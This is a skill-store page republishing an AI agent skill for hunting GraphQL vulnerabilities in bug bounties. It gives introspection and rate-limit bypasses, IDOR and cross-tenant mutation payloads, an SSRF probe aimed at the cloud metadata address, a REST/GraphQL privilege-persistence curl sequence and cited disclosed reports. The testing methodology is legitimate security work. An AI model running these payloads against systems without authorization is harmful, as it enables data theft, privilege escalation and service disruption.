‹ 首页

hunt-graphql

@elementalsouls · 收录于 1 周前 · 上游提交 2 周前

Hunting skill for graphql vulnerabilities. Built from 12 public bug bounty reports across IDOR via node() / GID, mutation IDOR including AI/LLM features, cross-tenant IDOR, SSRF via argument, batching-DoS, query-cost-bypass, SQLi via argument, broken-object-level-authz, auth-bypass via unscoped mutations, and PII exposure from missing field-level authz. Use when hunting graphql on any target.

适合你,如果你在渗透测试或漏洞赏金中需要快速检查 GraphQL 端点。

/ 下载安装
hunt-graphql.skill双击,或拖进 Claude 桌面版 / Cowork,即完成安装↓ .skill↓ .zip
用别的 agent?下载 .zip 解压,把文件夹放进它的技能目录
Claude Code~/.claude/skills/(项目级 .claude/skills/)
Codex CLI~/.codex/skills/
Cursor自动读取上面两处目录
其他工具见其文档的「skills」目录;两个下载是同一份文件,只是名字不同
/ 通过 npx 安装 校验哈希
npx oh-my-skill add elementalsouls/claude-bughunter/hunt-graphql
/ 通过 bash 安装
curl -fsSL https://oh-my-skill.com/install.sh | bash -s -- elementalsouls/claude-bughunter/hunt-graphql
/ 已经装过?验证本机副本,不用重装
npx oh-my-skill verify elementalsouls/claude-bughunter/hunt-graphql
安装目标可用 --agent / --scope 或 --to 明确指定;省略时只会在唯一已存在的 agent 目录上自动选择,零命中或多命中会停止并提示。content_hash 缺失或不一致均拒装。
2927GitHub stars
~3.9K上下文体积 · 单文件
镜像托管

怎么用

商店整理自技能原文 · 版本 05098fc · 表述以原文为准
它做什么

装上后,Claude 会帮你发现 GraphQL 接口的安全漏洞,比如越权访问、数据泄露、权限绕过等。

什么时候触发

当你需要测试某个网站的 GraphQL 接口安全性时触发。

装好后可以这样说
Claude 会按照技能中的步骤进行测试。
技能原文 SKILL.md作者撰写 · MIT · 05098fc
Crown Jewel Targets

GraphQL vulnerabilities are high-value because the attack surface is both broad and deep — a single endpoint can expose entire data models, privilege escalation paths, and cross-API state confusion. Highest payouts occur in:

  • Platform APIs (GitHub, Shopify, Stripe-tier targets) where GraphQL mutations interact with REST APIs managing the same resources
  • Race conditions between GraphQL mutations and REST endpoints where state synchronization is non-atomic — these hit medium-to-high severity reliably
  • Authorization persistence bugs where team/org/repo membership state is controlled by one API but readable/writable by another
  • B2B SaaS platforms where one tenant affecting another via schema traversal = critical
  • Internal admin GraphQL endpoints accidentally exposed to lower-privilege users

The GitHub reports demonstrate the crown jewel pattern: privilege that should be revoked persists because two APIs disagree on ground truth.


Attack Surface Signals

URL Patterns:

/graphql
/api/graphql
/v1/graphql
/query
/gql
/graph
/api/v2/graphql
/internal/graphql

Response Headers:

Content-Type: application/json  (with query body)
X-Request-Id + no REST-style path params = likely GraphQL

JavaScript Source Patterns:

// grep for these in JS bundles
"query {"
"mutation {"
"__typename"
"apollo"
"ApolloClient"
"graphql-tag"
"gql`"
"operationName"
"GRAPHQL_URI"

Tech Stack Signals:

  • Apollo Server/Client in JS bundles
  • Relay in React apps
  • graphene or strawberry (Python), graphql-ruby, gqlgen (Go), Lighthouse (Laravel)
  • POST requests with {"query": "..."} body shape in Burp history
  • __schema or __type in any response = confirmed GraphQL

Recon Sources:

  • github.com search: "graphql" site:target.com
  • Wayback Machine for /graphql paths
  • JS bundle scanning with LinkFinder or getallurls

Step-by-Step Hunting Methodology
  1. Discover the endpoint — spider JS bundles, check /graphql, /api/graphql, review Burp passive scan hits for application/json POST with query fields
  1. Test introspection — send the full introspection query. Even if blocked, try field-level enumeration: ```graphql { __typename } ``` If that returns, introspection may be partially blocked but the schema is discoverable
  1. Map the full schema — use InQL (Burp extension) or graphql-voyager to visualize relationships. Specifically look for:
  2. Mutations that modify ownership, permissions, or membership
  3. Mutations that mirror REST API functionality
  1. Identify REST/GraphQL overlap — document every resource that can be modified via BOTH REST and GraphQL. These dual-write surfaces are your RC targets.
  1. Test authorization boundaries per mutation — replay mutations as lower-privilege users. Does the server enforce the same authz as the equivalent REST call?
  1. Hunt cross-API state desync — find sequences where:
  2. REST action should revoke access
  3. GraphQL mutation re-grants or preserves it
  4. Test the ordering: REST first → GraphQL → check state; then GraphQL first → REST → check state
  1. Test for persistent privilege after role/membership changes — remove a user via REST, then call the corresponding GraphQL mutation for that resource. Query current state via both APIs and compare.
  1. Probe for IDOR in node IDs — GraphQL global IDs often encode object type + ID. Swap IDs across object boundaries and across account contexts.
  1. Check batch query abuse — send arrays of operations to bypass rate limiting or amplify enumeration.
  1. Document the exact reproduction chain — for RC bugs, time-based steps must be reproducible deterministically.

Payload & Detection Patterns

Full Introspection Query:

{
  __schema {
    types {
      name
      fields {
        name
        type {
          name
          kind
        }
      }
    }
  }
}

Minimal Introspection Probe (bypass attempt):

{ __typename }

curl introspection test:

curl -s -X POST https://target.com/graphql \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer YOUR_TOKEN" \
  -d '{"query":"{ __schema { queryType { name } } }"}' | jq .

Field suggestion probe (bypass blind introspection blocks):

{ unknownField }

If response returns "Did you mean: [realFieldName]?" — schema is enumerable despite introspection being disabled.

Batch query amplification:

[
  {"query": "{ user(id: 1) { email } }"},
  {"query": "{ user(id: 2) { email } }"},
  {"query": "{ user(id: 3) { email } }"}
]

RC desync test pattern (pseudo-sequence):

# Step 1: Grant access via REST
curl -X PUT https://api.target.com/repos/ORG/REPO/teams/TEAM \
  -H "Authorization: token ADMIN_TOKEN" \
  -d '{"permission":"admin"}'

# Step 2: Revoke via REST  
curl -X DELETE https://api.target.com/repos/ORG/REPO/teams/TEAM \
  -H "Authorization: token ADMIN_TOKEN"

# Step 3: Re-assert via GraphQL mutation
curl -X POST https://api.target.com/graphql \
  -H "Authorization: bearer ATTACKER_TOKEN" \
  -d '{"query":"mutation { updateTeamsRepository(input: {repositoryId: \"REPO_ID\", teamId: \"TEAM_ID\", permission: ADMIN}) { clientMutationId } }"}'

# Step 4: Verify persistent access
curl https://api.target.com/repos/ORG/REPO/teams \
  -H "Authorization: token ADMIN_TOKEN"

Grep for GraphQL in JS bundles:

grep -Eo '(query|mutation|subscription)\s+\w+\s*[\({]' bundle.js
grep -Eo '"(/[a-z0-9/_-]*graphql[a-z0-9/_-]*)"' bundle.js

InQL / clairvoyance for blind schema enumeration:

python3 clairvoyance.py -u https://target.com/graphql \
  -H "Authorization: Bearer TOKEN" \
  -w wordlist.txt -o schema.json

Common Root Causes
  1. Dual-write without atomic locking — developers implement the same resource modification in both REST and GraphQL independently. Neither system is aware the other exists for that resource. State updates aren't serialized or compared.
  1. Inconsistent authorization middleware — REST endpoints go through one auth layer (e.g., middleware chain), GraphQL resolvers go through a different resolver-level check. The same action, different enforcement.
  1. GraphQL as "new REST" migration — teams add GraphQL mutations that mirror REST functionality without auditing the permission model. The GraphQL version is less mature and skips checks the REST version accumulated over time.
  1. Introspection left on in production — default framework settings (Apollo, Graphene) enable introspection in all environments. Developers forget to disable it, treating it as "just documentation."
  1. Node ID trust without re-authorization — GraphQL global IDs (base64("ObjectType:123")) are decoded and trusted without verifying the requesting user has access to that specific object.
  1. Mutation side effects not mirrored — when a REST action triggers cascading effects (e.g., team removal cascades to permission revocation), the GraphQL equivalent mutation doesn't trigger the same cascades.

Bypass Techniques

Defense: Introspection disabled

  • Bypass via field suggestion errors — send invalid field names and parse "did you mean X?" responses
  • Use clairvoyance to brute-force field names against a wordlist
  • Check JS bundles for hardcoded query strings that reveal the schema

Defense: Depth limiting

  • Fragment spread to increase effective depth without hitting the limiter:
fragment F on User { repos { teams { members { ...F } } } }

Defense: Rate limiting per IP

  • Use batch operations (array of queries in one POST)
  • Distribute across authenticated sessions

Defense: Auth checks on mutations

  • Test with tokens at different privilege tiers (viewer, member, admin)
  • Test unauthenticated — some mutations don't check session at all
  • Test with tokens from different organizations — multi-tenant IDOR

Defense: WAF blocking __schema

  • Alias the introspection field:
{ s: __schema { t: types { n: name } } }
  • Use HTTP parameter pollution or alternate content-type headers

Defense: Operation whitelisting (persisted queries)

  • Check if the server falls back to ad-hoc queries when the extensions.persistedQuery hash mismatches
  • Look for a non-whitelisted endpoint (dev, staging, internal proxy)
Alias batching: when it wins races vs when it doesn't

A common claim is "alias batching defeats per-user rate limits and double-spend protections." Whether this actually wins depends on the resolver execution model:

| Resolver type | Behavior on aliased mutations | Alias batching wins races? | |---|---|---| | Multi-threaded / DataLoader-batched async | Aliases run concurrently, share state via batch | YES — single HTTP request can amplify a race-target N times | | Single-threaded / single-DB-connection per request | Aliases run serially; first mutation closes the door | NO — combine with parallel HTTP | | Distributed gateway (Apollo Federation) | Sub-queries dispatched concurrently to subgraphs | Depends on each subgraph |

Verification example (single-threaded Flask + SQLite resolver):

  • 10 aliased redeemCoupon mutations in one request → only r1 succeeds, r2-r10 fail with already_redeemed. Alias batching alone is insufficient.
  • The same 10 mutations as 20 parallel HTTP POSTs → 20 successes ($2000 from a $100 coupon).

Operator rule: treat alias batching as a single-RTT recon primitive. For race-target exploitation, combine with hunt-race-condition's parallel-HTTP / Turbo Intruder single-packet attack. Verified in docs/verification/phase2e-jwt-graphql-race.md Test 11 vs Test 12.


Gate 0 Validation
  1. What can the attacker DO right now? Must be a concrete action: access data they shouldn't see, retain privileges after revocation, modify another user's resources. "The schema is visible" alone is not enough — what does the schema unlock?
  1. What does the victim LOSE? Must be a real asset: data confidentiality, access control integrity, org security guarantees. For the RC pattern: an org admin loses the guarantee that removing a team revokes all access. That's a security contract violation.
  1. Can it be reproduced in 10 minutes from scratch? For RC/desync bugs: write the exact curl sequence. Run it twice. If the privilege persists deterministically (not timing-dependent flakiness), it's reportable. If it requires millisecond timing luck, document the window and test on low-load times.

Real Impact Examples

Scenario A — Covert Persistent Admin After Team Removal (GitHub-pattern) An attacker who legitimately had admin access to a repository via team membership gets removed by the org admin through the REST API. The attacker, before removal completes, calls the updateTeamsRepository GraphQL mutation to re-associate their team with admin permissions. The REST removal and GraphQL re-grant create a desync where the UI shows the team as removed, but the GraphQL state preserves admin-level access. The attacker retains covert write access to the repository indefinitely — pushing code, reading secrets in CI/CD — without appearing in the team's member list. This persists through org audits.

Scenario B — Covert Access via Repo Transfer Race (GitHub-pattern) An attacker with admin access initiates a repository transfer to another organization via the REST API. During or after the transfer, they invoke updateTeamsRepository on the now-transferred repo's ID. Because the GraphQL mutation doesn't validate current org ownership state consistently with the REST transfer event, the original attacker's team retains admin access on a repo now owned by a different organization. The receiving org has no visibility into this team association. The attacker can exfiltrate intellectual property from an org they have no legitimate relationship with.

Scenario C — Introspection as Reconnaissance Prerequisite (Shopify-pattern) On a platform where introspection is intentionally enabled (per-program rules), a hunter maps the full schema and discovers undocumented mutations for fulfillmentOrderMove and inventoryAdjust that are not surfaced in public docs. These mutations accept merchant IDs as arguments with no scoping validation visible in the schema. This recon directly enables targeted IDOR testing against merchant-to-merchant data isolation — the introspection itself is zero-severity, but it is the entry point to critical findings.


Disclosed Report Citations (Backfill +9 — 2019-2024)

The following real, verified bug-bounty / coordinated-disclosure cases extend this skill beyond the original 3 internal references. Each is a distinct GraphQL subclass with a working PoC documented in the cited writeup.

  1. HackerOne — Confidential user-data exposure via GraphQL User type (H1 #489146)
  2. Subclass: broken field-level authorization (PII exposure)
  3. Payload: direct user(id:...) query returning email, backup_codes_hash, facebook_user_id, account_recovery_phone_number_verified_at, totp_enabled
  4. Root cause: backend migration introduced a GraphQL User type with no field-level authz; any authenticated user could enumerate PII of all users
  5. Year: 2019 — $20,000, 1,028 upvotes
  1. HackerOne — DestroyLlmConversation mutation IDOR (Copilot pre-release) (H1 #2218334)
  2. Subclass: mutation IDOR on AI/LLM feature
  3. Payload: mutation { destroyLlmConversation(input:{id:"<victim_conv_id>"}) { … } }
  4. Root cause: new LLM-conversation mutation shipped without authorization decorator; any user could destroy any conversation
  5. Year: 2023 — caught pre-launch, no bounty (202 upvotes)
  1. Shopify — BillingDocumentDownload cross-tenant IDOR (H1 #2207248)
  2. Subclass: IDOR on relay GID across tenants
  3. Payload: query { billingDocumentDownload(id:"gid://shopify/BillingInvoice/<other_shop_id>") { url } }
  4. Root cause: BillingInvoice resolver authorized the requester's shop but did not verify the invoice belonged to that shop
  5. Year: 2024 — $5,000, 175 upvotes
  1. Shopify — Rate-limit bypass via negative cost (H1 #481518)
  2. Subclass: query-cost-calc abuse (sibling pattern to alias batching)
  3. Payload: query { products(first:-100) { … } } — negative first produced a negative query-cost contribution, refilling the leaky-bucket each call
  4. Root cause: query-cost calculator did not floor at zero; negative values subtracted from the consumed budget
  5. Year: 2019 — $1,000
  1. Stripe — Cross-tenant IDOR via UpdateAtlasApplicationPerson (H1 #1066203)
  2. Subclass: cross-tenant IDOR on mutation
  3. Payload: mutation { updateAtlasApplicationPerson(input:{personId:"<victim_person_id>", …}) } — adding/modifying a co-founder on another merchant's Stripe Atlas application
  4. Root cause: mutation scoped only to "is admin of some merchant," not "is admin of the merchant owning this person"
  5. Year: 2020 — bounty undisclosed (resolved)
  1. EXNESS — SSRF in GraphQL allTicks query (H1 #1864188)
  2. Subclass: SSRF via GraphQL argument
  3. Payload: query { allTicks(source:"http://169.254.169.254/latest/meta-data/") { … } }source arg fed into a server-side HTTP client
  4. Root cause: GraphQL field accepted a URL arg and dereferenced it without scheme/host allowlist
  5. Year: 2023 — $3,000, 249 upvotes
  1. EXNESS — GraphQL attribute-batching DoS (H1 #2293642)
  2. Subclass: DoS via batching / deep-attribute amplification on unauth endpoint
  3. Payload: single HTTP request containing N batched operations, each requesting deeply nested attribute trees, sustained until origin OOM
  4. Root cause: no query-depth, query-complexity, or batch-size limits on unauthenticated /graphql
  5. Year: 2024 — bounty undisclosed (resolved)
  1. GitLab — Malicious-runner attach via runnerUpdate (CVE-2023-2478) (Advisory)
  2. Subclass: auth bypass on mutation / project-scope missing
  3. Payload: mutation { runnerUpdate(input:{id:"<attacker_runner_gid>", associatedProjects:["<victim_project_gid>"]}) }
  4. Root cause: runnerUpdate did not check that the caller had Maintainer on the target project — any user could bind their malicious runner and intercept CI jobs (build secrets, code execution)
  5. Year: 2023 — Critical, CVSS 9.6 (H1 bounty undisclosed; GitLab Critical-tier typically $20k–$35k)
  1. AS Watson — Auth bypass via unrestricted createAdminUser mutation (HackerOne blog)
  2. Subclass: sensitive mutation reachable without authentication (introspection-aided discovery)
  3. Payload: mutation { createAdminUser(input:{email:"x@x", role:"ADMIN", password:"…"}) { token } } invoked unauthenticated after schema enumeration via introspection
  4. Root cause: schema lacked per-field authorization directives; createAdminUser exposed to public role
  5. Year: 2023 — "Best Bug" prize at HackerOne Ambassador World Cup

Related Skills & Chains
  • hunt-idor — GraphQL node(id:) and global-relay-ID resolvers are IDOR factories: same shape, no scoping. Chain primitive: GraphQL introspection + IDOR (node() resolver) → cross-tenant data via base64-decoded type:id replay.
  • hunt-api-misconfig — GraphQL mutations are mass-assignment magnets: clients send full input objects, server merges. Chain primitive: GraphQL mutation + extra fields (isAdmin:true, verified:true) → mass assignment → role escalation.
  • hunt-business-logic — GraphQL aliases let you call the same mutation N times in one request, defeating per-request rate limits. Chain primitive: aliased mutation + business-logic flaw → coupon redeemed N times in single network round-trip.
  • hunt-race-condition — GraphQL batching collapses N mutations into one HTTP packet — perfect single-packet race vehicle. Chain primitive: GraphQL batch + race → atomic-update missing → double-spend balance.
  • security-arsenal — Load the GraphQL Payload Pack: introspection query, schema-suggestion error probe, alias amplification template, depth-bomb DoS payload, batch-attack template.
  • triage-validation — Apply the Body-Diff Rule: introspection alone is informational; require a concrete cross-tenant read or mutation-with-impact PoC before submitting.
按 MIT 许可原样转载,未经改动 · 在 GitHub 查看 →

评论

登录即可评论;带「已验证安装」的,是发布者名下有本店的安装或持有记录。